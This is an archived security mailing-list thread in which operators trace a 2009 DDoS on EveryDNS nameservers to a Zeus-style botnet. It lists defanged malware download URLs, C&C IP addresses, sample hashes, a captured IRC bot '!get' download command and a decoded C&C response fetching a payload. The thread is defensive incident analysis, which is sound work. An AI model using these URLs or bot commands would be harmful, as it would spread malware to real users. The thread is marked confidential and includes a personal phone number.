[nsp-sec] DDoS to EveryDNS nameserver IPs

Stephen Gill gillsr at cymru.com
Wed Feb 4 20:53:04 EST 2009 

Alas the attachment was stripped.  Let's try that again:

https://www.cymru.com/nsp-sec/Owned/bigmap2.pdf

Please do NOT share outside of nsp-sec w/o permission.

Cheers,
-- steve

On 2/4/09 6:47 PM, "Stephen Gill" <gillsr at cymru.com> wrote:

> ----------- nsp-security Confidential --------
> 
> Indeed, it seems there's quite a bit behind that IP, mostly Web based
> botnets of the Zeus flavor.
> 
>  hxxp://horobl.cn/dll/v.txt
>  hxxp://rondolook.ru/loadero.exe
>  hxxp://ontilop.ru/.../in.php
>  hxxp://rondolook.ru/se2.exe
>  hxxp://horobl.cn/dll/svch.txt
>  hxxp://horobl.cn/dll/fo.txt
>  hxxp://horobl.cn/dll/jud.txt
>  hxxp://horobl.cn/dll/ger2.txt
>  hxxp://rondolook.ru/Resultx.exe
>  hxxp://horobl.cn/st/flag/testik/load.exe
>  hxxp://rondolook.ru/ftp.exe
>  hxxp://horobl.cn/dll/aad.txt
>  hxxp://horobl.cn/dll/ser.txt
>  hxxp://horobl.cn/dll/gh.txt
>  hxxp://rondolook.ru/Builld.exe
>  hxxp://rondolook.ru/l.exe
>  hxxp://horobl.cn/ex/a.php
>  hxxp://rondolook.ru/socks1.exe
>  hxxp://horobl.cn/met/ge.txt
>  hxxp://ontilop.ru/.../sploits/test.pdf
>  hxxp://rondolook.ru/Babj.exe
>  hxxp://ontilop.ru/.../e1.exe
>  hxxp://rondolook.ru/ch.exe
>  hxxp://rondolook.ru/loade.exe
>  hxxp://horobl.cn/dll/top.txt
>  hxxp://horobl.cn/dll/ger3.txt
>  hxxp://rondolook.ru/asti1113_4.exe
>  hxxp://horobl.cn/dll/us.txt
>  hxxp://rondolook.ru/I20081109A-ch_blowfish-2k_20090105.exe
>  hxxp://horobl.cn/dll/test.txt
>  hxxp://horobl.cn/dll/hell.txt
>  hxxp://goasi.cn/ex/a.php
>  hxxp://rondolook.ru/loaderop.exe
>  hxxp://horobl.cn/ex/0032.exe
>  hxxp://rondolook.ru/pro.exe
>  hxxp://horobl.cn/dll/ldr.txt
> 
> I've attached a quick 1/2 level deep PDF snapshot of the Ips - hopefully
> puck will cooperate.  If it doesn't I'll post a private URL.  If interested
> we can pull out all the nodes for easier parsing.  It's quite an elaborate
> network, and it gets really interesting if you go 1-2 more levels down.
> 
> Graph compressed on whitespace to make it easier for smaller screens.
> 
> Enjoy!
> 
> Cheers,
> -- steve
> 
> On 2/4/09 6:12 PM, "White, Gerard" <Gerard.White at aliant.ca> wrote:
> 
>> Ladies:
>> 
>> irc.zief.pl on TCP/80
>> 
>> JOIN #.364
>> PRIVMSG :!get hxxp://horobl.cn/ex/a.php
>> 
>> Name:    horobl.cn
>> Address:  211.95.79.6  (Note Typo from Below???)
>> 
>> HTTP/1.1 200 OK
>> Server:  nginx
>> 
>> MD5:  dc9f67ae1d175386625c97fcf22c77ab
>> 11776 Bytes:
>> http://www.virustotal.com/analisis/34c33485e6a0f326bf75b15cd2ae404c
>> 
>> 
>> Which then triggers:
>> GET hxxp://mega/lgate.php?n=<ID>
>> 
>> With a response of:
>> HTTP/1.1 200 OK
>> Server: nginx
>> 
>> Content-Length: 44
>> MCBodHRwOi8vc2V0ZG9jLmNuL2Rsay9jYWUuZXhlIDE=
>> 
>> 
>> Which decodes to:
>> GET hxxp://setdoc.cn/dlk/cae.exe
>> 
>> With a response of:
>> HTTP/1.1 200 OK
>> Date: Thu, 05 Feb 2009 08:39:36 GMT
>> Server: Apache/2.2.3 (CentOS)
>> Last-Modified: Tue, 03 Feb 2009 17:54:41 GMT
>> ETag: "154000f-1ae00-5d923a40"
>> Accept-Ranges: bytes
>> Content-Length: 110080
>> Connection: close
>> Content-Type: application/octet-stream
>> 
>> MD5: deac9c705ed0f4e4c1d0f3c5bb9aa9c1
>> http://www.virustotal.com/analisis/2cc2c169bfea6ee56d3298fc853d2355
>> 
>> Uses RSA crypto... drops a file "bogoa.exe"
>> 
>> MD5: 0c524d62abc45d466bd812b091b5d7b0
>> http://www.virustotal.com/analisis/a9ae781773cba091485e3863c40c1ab4
>> 
>> 
>> GW
>> 855 - Bell Aliant
>> 
>> 
>> -----Original Message-----
>> From: nsp-security-bounces at puck.nether.net
>> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Stephen Gill
>> Sent: Wednesday, February 04, 2009 7:49 PM
>> To: David Ulevitch; nsp-security at puck.nether.net
>> Subject: Re: [nsp-sec] DDoS to EveryDNS nameserver IPs
>> 
>> ----------- nsp-security Confidential --------
>> 
>> Supposedly these are the likely C&C candidates after a very helpful
>> individual took a brief glance at an infected machine:
>> 
>> 9800    | 211.95.76.6      | UNICOM CHINA UNICOM
>> 23898   | 58.65.232.34     | HOSTFRESH-AS-AP HostFresh Internet
>> 
>> I've fired up the malware on our Sandbox to see if it matches up.  There
>> are
>> quie a few varieties of this file and almost 0 AV pick it up.
>> 
>> You can also google for the most recent sample:
>> 
>> SHA1 a5396141cab8b22d9d88b28a814089537dce366a
>> MD5 01c3346c241652f43aed8e2149881bfe
>> 
>> Lawrence should have a seccheck now.
>> 
>> PID     1252   204.184.73.43:1168   58.65.232.34:80   ESTABLISHED
>> winlogon.exe   \??\C:\WINDOWS\SYSTEM32\winlogon.exe
>> 
>> PID     1252   204.184.73.43:1175   211.95.79.6:80   ESTABLISHED
>> winlogon.exe   \??\C:\WINDOWS\SYSTEM32\winlogon.exe
>> 
>> -- steve
>> 
>> 
>> On 2/4/09 11:39 AM, "David Ulevitch" <david at opendns.com> wrote:
>> 
>>> ----------- nsp-security Confidential --------
>>> 
>>> I'm currently receiving a large DDoS to all my EveryDNS nameserver
>> IPs:
>>> 
>>> ns1.everydns.net has address 208.76.56.56
>>> ns2.everydns.net has address 78.129.207.168
>>> ns3.everydns.net has address 71.6.202.220
>>> ns4.everydns.net has address 208.96.6.134
>>> 
>>> The DDoS appears to all be UDP packets of length 1000 bytes.
>>> 
>>> Here's what I mean:
>>> 
>>> 01:39:20.107917 IP 115.186.96.138.58798 > 208.76.56.56.2194: UDP,
>>> length 1000
>>> 01:39:20.107959 IP 82.212.143.159.2270 > 208.76.56.56.4000: UDP,
>>> length 1000
>>> 01:39:20.107969 IP 187.10.195.160.60001 > 208.76.56.56.2105: UDP,
>>> length 1000
>>> 01:39:20.107986 IP 189.119.47.137.25664 > 208.76.56.56.908: UDP,
>>> length 1000
>>> 01:39:20.107991 IP 213.189.175.47.3732 > 208.76.56.56.3804: UDP,
>>> length 1000
>>> 01:39:20.108012 IP 202.41.85.244.22349 > 208.76.56.56.3119: UDP,
>>> length 1000
>>> 01:39:20.108089 IP 89.174.93.234.4675 > 208.76.56.56.3589: UDP, length
>>> 1000
>>> 
>>> Anyone know what this looks like or anything I can do to stop it...
>>> 
>>> 3 of the 4 nameservers are offline right now, and I'm working with
>>> some folks to bring up some more machines now.  Ironically, I'm at the
>>> ICANN DNS meeting at GATech right now with a bunch of you. :-)
>>> 
>>> Thanks,
>>> David Ulevitch
>>> 415 971 6916
>>> 
>>> 
>>> _______________________________________________
>>> nsp-security mailing list
>>> nsp-security at puck.nether.net
>>> https://puck.nether.net/mailman/listinfo/nsp-security
>>> 
>>> Please do not Forward, CC, or BCC this E-mail outside of the
>> nsp-security
>>> community. Confidentiality is essential for effective Internet
>> security
>>> counter-measures.
>>> _______________________________________________

-- 
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 312 924 4023 | gillsr at cymru.com

More information about the nsp-security mailing list